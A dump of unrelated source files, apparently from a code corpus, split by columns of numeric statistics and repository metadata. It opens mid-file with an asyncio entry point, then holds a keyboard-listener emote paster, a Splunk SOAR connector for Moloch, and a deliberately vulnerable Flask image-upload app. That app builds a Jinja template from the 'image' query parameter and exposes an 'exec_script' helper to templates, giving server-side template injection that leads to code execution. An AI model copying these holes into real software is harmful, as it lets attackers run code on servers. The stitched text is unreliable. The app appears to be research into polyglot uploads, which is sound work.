    """Entry point: schedule the engine task and install signal handlers."""
    logger.info("Starting pipeline engine.")
    loop = asyncio.get_event_loop()
    run_task = loop.create_task(run())

    # Trigger a graceful shutdown on hangup, terminate, or keyboard interrupt.
    # Bind `sig` as a lambda default to avoid the late-binding closure pitfall.
    for sig in (signal.SIGHUP, signal.SIGTERM, signal.SIGINT):
        loop.add_signal_handler(
            sig, lambda sig=sig: asyncio.create_task(shutdown(sig, loop, run_task))
        )

    loop.run_forever()
| 29.681818
| 79
| 0.720265
| 255
| 1,959
| 5.427451
| 0.392157
| 0.043353
| 0.039017
| 0.052023
| 0.033237
| 0
| 0
| 0
| 0
| 0
| 0
| 0.00186
| 0.176621
| 1,959
| 65
| 80
| 30.138462
| 0.856169
| 0.036243
| 0
| 0.041667
| 0
| 0.020833
| 0.122546
| 0.012202
| 0
| 0
| 0
| 0
| 0
| 1
| 0.020833
| false
| 0
| 0.208333
| 0
| 0.229167
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
7570df54465fd5d936a3ab3554540e61e267bf96
| 2,369
|
py
|
Python
|
main.py
|
RareDrops/discord-emote-script
|
bc1f4892fd4294449b2340a51b276e4ebb3b37e6
|
[
"MIT"
] | null | null | null |
main.py
|
RareDrops/discord-emote-script
|
bc1f4892fd4294449b2340a51b276e4ebb3b37e6
|
[
"MIT"
] | null | null | null |
main.py
|
RareDrops/discord-emote-script
|
bc1f4892fd4294449b2340a51b276e4ebb3b37e6
|
[
"MIT"
] | null | null | null |
from pynput import keyboard
from pynput.keyboard import Key, Controller
from os.path import exists
import win32clipboard
import os
from PIL import Image
from pystray import Icon as icon, Menu, MenuItem as item
import pystray
RECORDING = False
WORD = ""
keyboard_press = Controller()
def send_to_clipboard(filepath):
win32clipboard.OpenClipboard()
win32clipboard.EmptyClipboard()
#the two lines of code below only works for some programs, does work on disocrd though(it is to preserve transparency)
wide_path = os.path.abspath(filepath).encode('utf-16-le') + b'\0'
win32clipboard.SetClipboardData(win32clipboard.RegisterClipboardFormat('FileNameW'), wide_path)
win32clipboard.CloseClipboard()
#then simulates pressing ctrl+v using the keyboard module:
keyboard_press.release(Key.shift_r)
with keyboard_press.pressed(Key.ctrl):
keyboard_press.press('v')
keyboard_press.release('v')
keyboard_press.press(Key.backspace)
keyboard_press.release(Key.backspace)
def find_image(word):
filepath = f"Emotes/{word.lower()}.png"
file_exist = exists(filepath)
if file_exist == False:
return
image = Image.open(filepath)
if image.size != (48, 48):
image = image.resize((48, 48))
image.save(filepath)
send_to_clipboard(filepath)
def on_press(key):
global RECORDING, WORD
try:
if key.char == ':':
if RECORDING == False:
RECORDING = True
else:
RECORDING = False
find_image(WORD)
WORD = ""
elif RECORDING == True:
WORD += key.char
if len(WORD) > 30:
RECORDING = False
WORD = ""
except AttributeError:
if RECORDING == True:
if key == Key.backspace:
WORD = WORD[:-1]
elif key == Key.enter:
RECORDING = False
WORD = ""
# Collect events until released
listener = keyboard.Listener(on_press=on_press)
listener.start()
temp_iterable = []
image = Image.open('keyboard.ico')
icon = pystray.Icon('discord-emotes',image,'discord-emotes',temp_iterable)
menu = Menu(item('quit',lambda : icon.stop()),)
icon.menu = menu
icon.run()
| 29.987342
| 123
| 0.61545
| 268
| 2,369
| 5.354478
| 0.425373
| 0.063415
| 0.037631
| 0.032056
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.015376
| 0.286197
| 2,369
| 78
| 124
| 30.371795
| 0.833235
| 0.086112
| 0
| 0.126984
| 0
| 0
| 0.044273
| 0.012031
| 0
| 0
| 0
| 0
| 0
| 1
| 0.047619
| false
| 0
| 0.126984
| 0
| 0.190476
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
7571df3479e0827912764d9107db9cc7c8bfd97c
| 27,986
|
py
|
Python
|
moloch_connector.py
|
splunk-soar-connectors/moloch
|
d1956ee500b2c3f3882f3512366ae480270e89f8
|
[
"Apache-2.0"
] | 1
|
2022-02-13T19:18:41.000Z
|
2022-02-13T19:18:41.000Z
|
moloch_connector.py
|
splunk-soar-connectors/moloch
|
d1956ee500b2c3f3882f3512366ae480270e89f8
|
[
"Apache-2.0"
] | 2
|
2021-12-09T01:35:35.000Z
|
2022-02-24T20:04:27.000Z
|
moloch_connector.py
|
splunk-soar-connectors/moloch
|
d1956ee500b2c3f3882f3512366ae480270e89f8
|
[
"Apache-2.0"
] | null | null | null |
# File: moloch_connector.py
#
# Copyright (c) 2019-2022 Splunk Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software distributed under
# the License is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND,
# either express or implied. See the License for the specific language governing permissions
# and limitations under the License.
#
#
import ipaddress
import json
import os
import magic
import phantom.app as phantom
import phantom.rules as ph_rules
import requests
from bs4 import BeautifulSoup, UnicodeDammit
from phantom.action_result import ActionResult
from phantom.base_connector import BaseConnector
from requests.auth import HTTPDigestAuth
from moloch_consts import *
class RetVal(tuple):
    """Immutable (status, value) pair returned by the REST helper methods."""

    def __new__(cls, val1, val2):
        # Build the fixed two-element tuple via the tuple constructor.
        pair = (val1, val2)
        return super().__new__(RetVal, pair)
class MolochConnector(BaseConnector):
    """Splunk SOAR connector for the Moloch (Arkime) packet capture system.

    Supported actions: test connectivity, get pcap (streamed into the vault),
    list fields, and list files — all via Moloch's REST API using HTTP digest
    authentication.
    """

    def __init__(self):

        # Call the BaseConnectors init first
        super(MolochConnector, self).__init__()

        self._state = None
        self._server_url = None
        self._port = None
        self._username = None
        self._password = None
        self._verify_server_cert = False

    @staticmethod
    def _is_valid_port(port):
        """Return True if *port* is a non-negative integer in [0, 65535].

        Shared by every action handler so the validation logic lives in
        exactly one place.
        """
        return str(port).isdigit() and 0 <= int(port) <= 65535

    def initialize(self):
        """ This is an optional function that can be implemented by the AppConnector derived class. Since the
        configuration dictionary is already validated by the time this function is called, it's a good place to do any
        extra initialization of any internal modules. This function MUST return a value of either phantom.APP_SUCCESS or
        phantom.APP_ERROR. If this function returns phantom.APP_ERROR, then AppConnector::handle_action will not get
        called.
        """
        self._state = self.load_state()

        # get the asset config
        config = self.get_config()

        # Access values in asset config by the name
        self._server_url = config[MOLOCH_CONFIG_SERVER_URL].strip('/')
        self._port = config.get(MOLOCH_CONFIG_PORT, 8005)
        self._username = config[MOLOCH_CONFIG_USERNAME]
        self._password = config[MOLOCH_CONFIG_PASSWORD]
        self._verify_server_cert = config.get(MOLOCH_VERIFY_SERVER_CERT, False)

        # Custom validation for IP address
        self.set_validator(MOLOCH_PARAM_IP, self._is_ip)

        return phantom.APP_SUCCESS

    def _is_ip(self, ip_address):
        """ Function that checks given address and return True if address is valid IP address.

        :param ip_address: IP address
        :return: status (success/failure)
        """
        # ipaddress.ip_address raises for anything that is not valid IPv4/IPv6
        try:
            ipaddress.ip_address(UnicodeDammit(ip_address).unicode_markup)
        except Exception as e:
            self.debug_print(MOLOCH_INVALID_IP, e)
            return False
        return True

    def _process_empty_reponse(self, response, action_result):
        """ This function is used to process empty response.

        NOTE: the method name keeps its historical misspelling ("reponse") so
        that any external caller or subclass keeps working.

        :param response: response data
        :param action_result: object of Action Result
        :return: status phantom.APP_ERROR/phantom.APP_SUCCESS(along with appropriate message)
        """
        if response.status_code == 200:
            return RetVal(phantom.APP_SUCCESS, {})

        return RetVal(action_result.set_status(phantom.APP_ERROR, "Empty response and no information in the header"),
                      None)

    def _process_html_response(self, response, action_result):
        """ This function is used to process html response.

        :param response: response data
        :param action_result: object of Action Result
        :return: status phantom.APP_ERROR/phantom.APP_SUCCESS(along with appropriate message)
        """
        # An html response, treat it like an error
        status_code = response.status_code

        try:
            soup = BeautifulSoup(response.text, "html.parser")
            # Remove the script, style, footer and navigation part from the HTML message
            for element in soup(["script", "style", "footer", "nav"]):
                element.extract()
            error_text = soup.text
            split_lines = error_text.split('\n')
            split_lines = [x.strip() for x in split_lines if x.strip()]
            error_text = '\n'.join(split_lines)
        except Exception:
            error_text = "Cannot parse error details"

        message = "Status Code: {0}. Data from server:\n{1}\n".format(status_code, error_text)
        # Escape braces so the message survives later str.format passes
        message = message.replace('{', '{{').replace('}', '}}')

        return RetVal(action_result.set_status(phantom.APP_ERROR, message), None)

    def _process_json_response(self, response, action_result):
        """ This function is used to process json response.

        :param response: response data
        :param action_result: object of Action Result
        :return: status phantom.APP_ERROR/phantom.APP_SUCCESS(along with appropriate message)
        """
        # Try a json parse
        try:
            resp_json = response.json()
        except Exception as e:
            return RetVal(action_result.set_status(phantom.APP_ERROR, "Unable to parse JSON response. Error: {0}".
                                                   format(str(e))), None)

        # Please specify the status codes here
        if 200 <= response.status_code < 399:
            return RetVal(phantom.APP_SUCCESS, resp_json)

        # You should process the error returned in the json
        message = "Error from server. Status Code: {0} Data from server: {1}".format(response.status_code,
                                                                                     response.text.replace('{', '{{').
                                                                                     replace('}', '}}'))

        return RetVal(action_result.set_status(phantom.APP_ERROR, message), None)

    def _process_pcap_response(self, response, action_result):
        """ This function is used to process pcap response.

        The pcap body itself is streamed to a temp file by _make_rest_call;
        here we only map the status code to success/failure.

        :param response: response data
        :param action_result: object of Action Result
        :return: status phantom.APP_ERROR/phantom.APP_SUCCESS(along with appropriate message)
        """
        if 200 <= response.status_code < 399:
            return RetVal(phantom.APP_SUCCESS, {})

        message = "Error from server. Status Code: {0} Data from server: {1}".format(response.status_code,
                                                                                     response.text.replace('{', '{{').
                                                                                     replace('}', '}}'))

        return RetVal(action_result.set_status(phantom.APP_ERROR, message), None)

    def _process_response(self, response, action_result):
        """ This function dispatches on the response Content-Type.

        :param response: response data
        :param action_result: object of Action Result
        :return: status phantom.APP_ERROR/phantom.APP_SUCCESS(along with appropriate message)
        """
        # store the r_text in debug data, it will get dumped in the logs if the action fails
        # (skipped for a successful get_pcap: the body is binary pcap data)
        if hasattr(action_result, 'add_debug_data') and (self.get_action_identifier() != "get_pcap" or not
                                                         (200 <= response.status_code < 399)):
            action_result.add_debug_data({'r_status_code': response.status_code})
            action_result.add_debug_data({'r_text': response.text})
            action_result.add_debug_data({'r_headers': response.headers})

        # Process each 'Content-Type' of response separately

        # Process a json response
        if 'json' in response.headers.get('Content-Type', ''):
            return self._process_json_response(response, action_result)

        if 'pcap' in response.headers.get('Content-Type', ''):
            return self._process_pcap_response(response, action_result)

        # Process an HTML resonse, Do this no matter what the API talks.
        # There is a high chance of a PROXY in between phantom and the rest of
        # world, in case of errors, PROXY's return HTML, this function parses
        # the error and adds it to the action_result.
        if 'html' in response.headers.get('Content-Type', ''):
            return self._process_html_response(response, action_result)

        # it's not content-type that is to be parsed, handle an empty response
        if not response.text:
            return self._process_empty_reponse(response, action_result)

        # everything else is actually an error at this point
        message = "Can't process response from server. Status Code: {0} Data from server: {1}".\
            format(response.status_code, response.text.replace('{', '{{').replace('}', '}}'))

        return RetVal(action_result.set_status(phantom.APP_ERROR, message), None)

    def _make_rest_call(self, endpoint, action_result, headers=None, params=None, data=None, method="get",
                        timeout=None):
        """ Function that makes the REST call to the device. It's a generic function that can be called from various
        action handlers.

        :param endpoint: REST endpoint that needs to appended to the service address
        :param action_result: object of ActionResult class
        :param headers: request headers
        :param params: request parameters
        :param data: request body
        :param method: GET/POST/PUT/DELETE (Default will be GET)
        :param timeout: Timeout for API call
        :return: status phantom.APP_ERROR/phantom.APP_SUCCESS(along with appropriate message),
        response obtained by making an API call
        """
        resp_json = None

        try:
            request_func = getattr(requests, method)
        except AttributeError:
            return RetVal(action_result.set_status(phantom.APP_ERROR, "Invalid method: {0}".format(method)), resp_json)

        # Create a URL to connect to
        try:
            url = '{url}{endpoint}'.format(url=self._server_url, endpoint=endpoint)
        except Exception:
            return RetVal(action_result.set_status(phantom.APP_ERROR, "Invalid URL. Please provide a valid URL"), resp_json)

        try:
            # In case of get_pcap action stream the response and store it into temp file
            if self.get_action_identifier() == 'get_pcap':
                r = request_func(url, auth=HTTPDigestAuth(self._username, self._password), json=data, headers=headers,
                                 verify=self._verify_server_cert, timeout=timeout, params=params, stream=True)

                # Create temp_file_path using asset_id
                temp_file_path = '{dir}{asset}_temp_pcap_file'.format(dir=self.get_state_dir(),
                                                                     asset=self.get_asset_id())

                # If API call is success
                if 200 <= r.status_code < 399:
                    # Stream the pcap body to disk in chunks to bound memory use
                    with open(temp_file_path, 'wb') as pcap_file:
                        for chunk in r.iter_content(chunk_size=1024):
                            if chunk:
                                pcap_file.write(chunk)
            else:
                r = request_func(url, auth=HTTPDigestAuth(self._username, self._password), json=data, headers=headers,
                                 verify=self._verify_server_cert, timeout=timeout, params=params)
        except Exception as e:
            return RetVal(action_result.set_status(phantom.APP_ERROR, "Error Connecting to server. Details: {0}".
                                                   format(str(e))), resp_json)

        return self._process_response(r, action_result)

    def _handle_test_connectivity(self, param):
        """ This function is used to test the connectivity of an asset with given credentials.

        :param param: (not used in this method)
        :return: status success/failure
        """
        action_result = self.add_action_result(ActionResult(dict(param)))
        self.save_progress(MOLOCH_TEST_CONNECTION)

        # Validate port
        if not self._is_valid_port(self._port):
            self.save_progress(MOLOCH_TEST_CONNECTIVITY_FAILED)
            return action_result.set_status(phantom.APP_ERROR, status_message='{}. {}'.format(
                MOLOCH_CONNECTING_ERROR_MSG, MOLOCH_INVALID_CONFIG_PORT))

        params = {'length': 1}
        endpoint = ':{port}{endpoint}'.format(port=self._port, endpoint=MOLOCH_TEST_CONNECTIVITY_ENDPOINT)

        # make REST call
        ret_val, response = self._make_rest_call(endpoint=endpoint, params=params, action_result=action_result,
                                                 timeout=MOLOCH_TEST_CONNECTIVITY_TIMEOUT)

        if phantom.is_fail(ret_val):
            self.save_progress(MOLOCH_TEST_CONNECTIVITY_FAILED)
            return action_result.get_status()

        self.save_progress(MOLOCH_TEST_CONNECTIVITY_PASSED)
        return action_result.set_status(phantom.APP_SUCCESS)

    def _handle_get_pcap(self, param):
        """ This function is used to get pcap file and store it into vault.

        :param param: Dictionary of input parameters
        :return: status success/failure
        """
        self.save_progress("In action handler for: {0}".format(self.get_action_identifier()))
        action_result = self.add_action_result(ActionResult(dict(param)))
        summary = action_result.update_summary({})

        # Validate port
        if not self._is_valid_port(self._port):
            self.debug_print(MOLOCH_INVALID_CONFIG_PORT)
            return action_result.set_status(phantom.APP_ERROR, status_message=MOLOCH_INVALID_CONFIG_PORT)

        # Get parameters
        start_time = param[MOLOCH_JSON_START_TIME]
        end_time = param[MOLOCH_JSON_END_TIME]
        source_ip = param.get(MOLOCH_JSON_SOURCE_IP)
        dest_ip = param.get(MOLOCH_JSON_DESTINATION_IP)
        hostname = param.get(MOLOCH_JSON_HOSTNAME)
        custom_query = param.get(MOLOCH_JSON_CUSTOM_QUERY)
        limit = param.get(MOLOCH_JSON_LIMIT, 50)

        # Validate start_time parameter
        try:
            start_time = int(float(start_time))
        except Exception:
            self.debug_print(MOLOCH_INVALID_START_TIME)
            return action_result.set_status(phantom.APP_ERROR, status_message=MOLOCH_INVALID_START_TIME)

        # Validate end_time parameter
        try:
            end_time = int(float(end_time))
        except Exception:
            self.debug_print(MOLOCH_INVALID_END_TIME)
            return action_result.set_status(phantom.APP_ERROR, status_message=MOLOCH_INVALID_END_TIME)

        # Compare value of start_time and end_time
        if start_time >= end_time:
            self.debug_print(MOLOCH_INVALID_TIME_RANGE)
            return action_result.set_status(phantom.APP_ERROR, status_message=MOLOCH_INVALID_TIME_RANGE)

        # Validate parameter limit
        try:
            limit = int(float(limit))
        except Exception:
            self.debug_print(MOLOCH_INVALID_LIMIT_MSG)
            return action_result.set_status(phantom.APP_ERROR, status_message=MOLOCH_INVALID_LIMIT_MSG)

        # Moloch accepts at most 2,000,000 sessions per query
        if not 0 <= limit <= 2000000:
            self.debug_print(MOLOCH_INVALID_LIMIT_MSG)
            return action_result.set_status(phantom.APP_ERROR, status_message=MOLOCH_INVALID_LIMIT_MSG)

        params = dict()
        params['length'] = limit
        params['startTime'] = start_time
        params['stopTime'] = end_time

        # Build the Moloch search expression from the optional filters
        expressions = []

        # Add source_ip to expression, if available
        if source_ip:
            expressions.append('ip.src == {source_ip}'.format(source_ip=source_ip))

        # Add dest_ip to expression, if available
        if dest_ip:
            expressions.append('ip.dst == {dst_ip}'.format(dst_ip=dest_ip))

        # Add hostname to expression, if available
        if hostname:
            expressions.append('host.http == {hostname}'.format(hostname=hostname))

        # Add custom_query to expression, if available
        if custom_query:
            expressions.append(custom_query)

        expression = " && ".join(expressions)

        if expression:
            params['expression'] = expression

        endpoint = ':{port}{endpoint}'.format(port=self._port, endpoint=MOLOCH_GET_PCAP_ENDPOINT)

        # make REST call
        ret_val, response = self._make_rest_call(endpoint=endpoint, action_result=action_result, params=params)

        if phantom.is_fail(ret_val):
            return action_result.get_status()

        # Create filename using input parameters.
        # Bug fix: the format strings below previously omitted the {filename}
        # placeholder (while still passing filename=), so every earlier part
        # of the name was silently discarded.
        filename = 'moloch_{start_time}_{end_time}'.format(start_time=start_time, end_time=end_time)
        inputs = [('src_ip', source_ip), ('dst_ip', dest_ip), ('hostname', hostname)]
        for input_key, input_val in inputs:
            if input_val:
                filename = '{filename}_{input_key}_{input_val}'.format(filename=filename, input_key=input_key,
                                                                       input_val=input_val)
        filename = '{filename}_limit_{limit}'.format(filename=filename, limit=limit)
        filename = '{filename}.pcap'.format(filename=filename)

        temp_file_path = '{dir}{asset}_temp_pcap_file'.format(dir=self.get_state_dir(), asset=self.get_asset_id())

        # If file size is zero
        if not os.path.getsize(temp_file_path):
            # Delete file
            os.unlink(temp_file_path)
            self.debug_print(MOLOCH_NO_DATA_FOUND_MSG)
            return action_result.set_status(phantom.APP_ERROR, status_message=MOLOCH_NO_DATA_FOUND_MSG)

        # Check if file is text file: Moloch reports errors as plain text even
        # on the pcap endpoint.
        # mime=True only returns mimetypes instead of textual description
        magic_obj = magic.Magic(mime=True)
        file_type = magic_obj.from_file(temp_file_path)

        if file_type == 'text/plain':
            with open(temp_file_path) as temp_file:
                temp_file_data = temp_file.read()
            message = 'Error while getting data from server. {api_message}'.\
                format(api_message=temp_file_data)
            self.debug_print(message)
            return action_result.set_status(phantom.APP_ERROR, status_message=message)

        invalid_chars = r'[]<>/\():;"\'|*()`~!@#$%^&+={}?,'
        # Strip characters that are unsafe in file names. Python 3's
        # str.translate takes a mapping of ordinals; the old two-argument form
        # was Python 2 only, so the legacy try/except fallback was removed.
        filename = filename.translate({ord(invalid_char): None for invalid_char in invalid_chars})

        _, _, vault_file_list = ph_rules.vault_info(file_name=filename)
        vault_file_list = list(vault_file_list)

        # Iterate through files of Vault
        for file in vault_file_list:
            # If file name and file size are same file is duplicate
            if file.get('name') == filename and file.get('size') == os.path.getsize(temp_file_path):
                self.debug_print(MOLOCH_FILE_ALREADY_AVAILABLE)
                vault_file_details = {
                    phantom.APP_JSON_SIZE: file.get('size'),
                    phantom.APP_JSON_VAULT_ID: file.get('vault_id'),
                    'file_name': filename
                }
                summary['vault_id'] = file.get('vault_id')
                # Delete temp file
                os.unlink(temp_file_path)
                action_result.add_data(vault_file_details)
                return action_result.set_status(phantom.APP_SUCCESS)

        vault_file_details = {phantom.APP_JSON_SIZE: os.path.getsize(temp_file_path)}

        # Adding file to vault
        success, _, vault_id = ph_rules.vault_add(file_location=temp_file_path, container=self.get_container_id(), file_name=filename,
                                                  metadata=vault_file_details)

        # Updating report data with vault details
        if not success:
            self.debug_print('Error while adding the file to vault')
            return action_result.set_status(phantom.APP_ERROR, status_message='Error while adding the file to vault')

        vault_file_details[phantom.APP_JSON_VAULT_ID] = vault_id
        vault_file_details['file_name'] = filename
        action_result.add_data(vault_file_details)

        # Use the local vault_id rather than re-reading the dict with a literal
        # key, which only worked because APP_JSON_VAULT_ID == 'vault_id'.
        summary['vault_id'] = vault_id

        return action_result.set_status(phantom.APP_SUCCESS)

    def _handle_list_fields(self, param):
        """ This function is used to list all fields.

        :param param: dictionary of input parameters
        :return: status success/failure
        """
        self.save_progress("In action handler for: {0}".format(self.get_action_identifier()))
        action_result = self.add_action_result(ActionResult(dict(param)))

        port = param.get(MOLOCH_PARAM_PORT, 9200)

        # Validate port
        if not self._is_valid_port(port):
            self.debug_print(MOLOCH_INVALID_PARAM_PORT)
            return action_result.set_status(phantom.APP_ERROR, status_message=MOLOCH_INVALID_PARAM_PORT)

        endpoint = ':{port}{endpoint}'.format(port=port, endpoint=MOLOCH_LIST_FIELDS_ENDPOINT)

        # make REST call
        ret_val, response = self._make_rest_call(endpoint=endpoint, action_result=action_result)

        # Something went wrong
        if phantom.is_fail(ret_val):
            message = action_result.get_message()
            self.debug_print(message)
            # A 200 with angular markup means we hit Moloch's UI instead of
            # the Elasticsearch port.
            if "Status Code: 200" in message and "angular.module" in message:
                action_result.set_status(phantom.APP_ERROR, "Unable to connect to server. "
                                                            "Please make sure that entered port is correct")
            return action_result.get_status()

        # Add data to action_result
        for content in response.get("hits", {}).get("hits", []):
            action_result.add_data(content)

        summary = action_result.update_summary({})
        summary['total_fields'] = action_result.get_data_size()

        return action_result.set_status(phantom.APP_SUCCESS)

    def _handle_list_files(self, param):
        """ This function is used to list all files.

        :param param: (not used in this method)
        :return: status success/failure
        """
        self.save_progress("In action handler for: {0}".format(self.get_action_identifier()))
        action_result = self.add_action_result(ActionResult(dict(param)))

        # Validate port
        if not self._is_valid_port(self._port):
            self.debug_print(MOLOCH_INVALID_CONFIG_PORT)
            return action_result.set_status(phantom.APP_ERROR, status_message=MOLOCH_INVALID_CONFIG_PORT)

        endpoint = ':{port}{endpoint}'.format(port=self._port, endpoint=MOLOCH_LIST_FILES_ENDPOINT)

        # make REST call
        ret_val, response = self._make_rest_call(endpoint=endpoint, action_result=action_result)

        # Something went wrong
        if phantom.is_fail(ret_val):
            message = action_result.get_message()
            self.debug_print(message)
            return action_result.get_status()

        # Add data to action_result
        for content in response["data"]:
            action_result.add_data(content)

        summary = action_result.update_summary({})
        summary['total_files'] = action_result.get_data_size()

        return action_result.set_status(phantom.APP_SUCCESS)

    def handle_action(self, param):
        """ This function gets current action identifier and calls member function of its own to handle the action.

        :param param: dictionary which contains information about the actions to be executed
        :return: status success/failure
        """
        self.debug_print("action_id", self.get_action_identifier())

        # Dictionary mapping each action with its corresponding handler
        action_mapping = {
            'test_connectivity': self._handle_test_connectivity,
            'get_pcap': self._handle_get_pcap,
            'list_files': self._handle_list_files,
            'list_fields': self._handle_list_fields
        }

        action = self.get_action_identifier()
        action_execution_status = phantom.APP_SUCCESS

        if action in action_mapping:
            action_function = action_mapping[action]
            action_execution_status = action_function(param)

        return action_execution_status

    def finalize(self):
        """ This function gets called once all the param dictionary elements are looped over and no more handle_action
        calls are left to be made. It gives the AppConnector a chance to loop through all the results that were
        accumulated by multiple handle_action function calls and create any summary if required. Another usage is
        cleanup, disconnect from remote devices etc.

        :return: status (success/failure)
        """
        self.save_state(self._state)
        return phantom.APP_SUCCESS
if __name__ == '__main__':
    # Standalone debug harness: run one action from a test JSON file against a
    # local SOAR instance, optionally logging in first to obtain a session id.
    import argparse
    import sys

    import pudb
    # Drop into the pudb debugger immediately (development harness only)
    pudb.set_trace()

    argparser = argparse.ArgumentParser()

    argparser.add_argument('input_test_json', help='Input Test JSON file')
    argparser.add_argument('-u', '--username', help='username', required=False)
    argparser.add_argument('-p', '--password', help='password', required=False)
    argparser.add_argument('-v', '--verify', action='store_true', help='verify', required=False, default=False)

    args = argparser.parse_args()
    session_id = None

    username = args.username
    password = args.password
    verify = args.verify

    if username is not None and password is None:
        # User specified a username but not a password, so ask
        import getpass
        password = getpass.getpass("Password: ")

    if username and password:
        # Authenticate against the platform to get a session cookie so the
        # connector can act on behalf of this user.
        login_url = BaseConnector._get_phantom_base_url() + "login"
        try:
            print("Accessing the Login page")
            r = requests.get(login_url, verify=verify, timeout=MOLOCH_DEFAULT_TIMEOUT)
            csrftoken = r.cookies['csrftoken']

            data = dict()
            data['username'] = username
            data['password'] = password
            data['csrfmiddlewaretoken'] = csrftoken

            headers = dict()
            headers['Cookie'] = 'csrftoken={}'.format(csrftoken)
            headers['Referer'] = login_url

            print("Logging into Platform to get the session id")
            r2 = requests.post(login_url, verify=verify, data=data, headers=headers, timeout=MOLOCH_DEFAULT_TIMEOUT)
            session_id = r2.cookies['sessionid']
        except Exception as e:
            print("Unable to get session id from the platform. Error: {}".format(str(e)))
            sys.exit(1)

    if len(sys.argv) < 2:
        print("No test json specified as input")
        sys.exit(0)

    with open(sys.argv[1]) as f:
        in_json = f.read()
        in_json = json.loads(in_json)
        print(json.dumps(in_json, indent=4))

        connector = MolochConnector()
        connector.print_progress_message = True

        if session_id is not None:
            in_json['user_session_token'] = session_id

        ret_val = connector._handle_action(json.dumps(in_json), None)
        print(json.dumps(json.loads(ret_val), indent=4))

    sys.exit(0)
| 41.460741
| 134
| 0.643393
| 3,418
| 27,986
| 5.034523
| 0.145114
| 0.061367
| 0.031613
| 0.03417
| 0.447931
| 0.40086
| 0.371746
| 0.345188
| 0.342631
| 0.31218
| 0
| 0.005876
| 0.270314
| 27,986
| 674
| 135
| 41.522255
| 0.836786
| 0.221003
| 0
| 0.256906
| 0
| 0.013812
| 0.087072
| 0.006712
| 0
| 0
| 0
| 0
| 0
| 1
| 0.044199
| false
| 0.033149
| 0.044199
| 0.002762
| 0.21547
| 0.063536
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
7574fa5420556c5e1887475cd923bc9a0ffab1f4
| 2,600
|
py
|
Python
|
testing/python-image-upload/upload.py
|
pkalauner-tuwien/polyglot-and-ambiguous-files
|
109eb7d5533de4a053841313e7c14918f9cd9df0
|
[
"MIT"
] | null | null | null |
testing/python-image-upload/upload.py
|
pkalauner-tuwien/polyglot-and-ambiguous-files
|
109eb7d5533de4a053841313e7c14918f9cd9df0
|
[
"MIT"
] | 1
|
2021-03-23T20:13:21.000Z
|
2021-03-23T20:13:21.000Z
|
testing/python-image-upload/upload.py
|
pkalauner-tuwien/polyglot-and-ambiguous-files
|
109eb7d5533de4a053841313e7c14918f9cd9df0
|
[
"MIT"
] | null | null | null |
from flask import *
from flask_csp.csp import csp_header, csp_default
import imghdr
import os
import hashlib
import subprocess
# Flask app and upload policy: files land in 'uploads' and only common image
# extensions are accepted.
app = Flask(__name__)
app.config["UPLOAD_DIRECTORY"] = 'uploads'
app.config["ALLOWED_EXTENSIONS"] = ["jpg", "jpeg", "png", "gif"]
# Remove report-uri from default CSP header
h = csp_default()
h.update({'report-uri':""})
@app.route('/')
@app.route('/upload')
@csp_header()
def index():
    """Serve the upload form (GET handler for both '/' and '/upload')."""
    return render_template("upload.html")
@app.route('/upload', methods = ['POST'])
@csp_header()
def upload():
    """Handle an image upload: validate extension and content, then store it.

    Renders the upload page with a status message; on success the stored
    image path is passed to the template.
    """
    f = request.files['file']

    # Check extension
    if "." not in f.filename:
        return render_template("upload.html", msg="The selected file has an invalid extension.")
    name, ext = f.filename.rsplit(".", 1)
    ext = ext.lower()
    if ext not in app.config["ALLOWED_EXTENSIONS"]:
        return render_template("upload.html", msg="The selected file has an invalid extension.")

    # Hash the base name so user-controlled text never reaches the filesystem path
    hashed_name = hashlib.md5(name.encode("utf-8")).hexdigest()
    path = os.path.join(app.config["UPLOAD_DIRECTORY"], "{}.{}".format(hashed_name, ext))

    # Append a counter if the file already exists ('counter' replaces the
    # original name 'id', which shadowed the builtin)
    counter = 1
    while os.path.isfile(path):
        path = os.path.join(app.config["UPLOAD_DIRECTORY"], "{}_{}.{}".format(hashed_name, counter, ext))
        counter += 1
    f.save(path)

    # Check file content so only changing extension cannot bypass the check.
    # Bug fix: imghdr.what() returns None for unrecognized data; the original
    # called .lower() on it and crashed with AttributeError (HTTP 500).
    detected = imghdr.what(path)
    if detected is None or detected.lower() not in app.config["ALLOWED_EXTENSIONS"]:
        os.remove(path)
        return render_template("upload.html", msg="The selected file is not an image.")
    return render_template("upload.html", msg="Upload successful!", imagepath = path)
@app.route('/view')
@csp_header()
def view():
    """Render the viewer page for the image named in the ``image`` query arg.

    WARNING: intentionally vulnerable PoC — the missing-file branch builds a
    Jinja template string directly from user input (server-side template
    injection). Kept as-is because demonstrating this is the project's point.
    """
    imagepath = request.args.get('image')
    if not os.path.isfile(imagepath):
        # Vulnerable, see method below
        template = "{% extends 'index.html' %}{% block content %}<h4>Image " + imagepath + " does not exist.</h4>{% endblock %}"
        return render_template_string(template)
    return render_template("view.html", imagepath=imagepath)
# PoC helper showing why attackers must never be able to upload arbitrary code.
# It obviously should not exist in a real application; code execution could
# also be reached through other, more sophisticated ways.
def exec_script(file):
    """Run *file* with python3 and return its captured stdout (bytes)."""
    command = ['python3', file]
    return subprocess.check_output(command)
# Expose the PoC helper to Jinja templates — this is the injection gadget
# reachable through the vulnerable view() above.
app.jinja_env.globals['exec_script'] = exec_script # Allow usage in templates
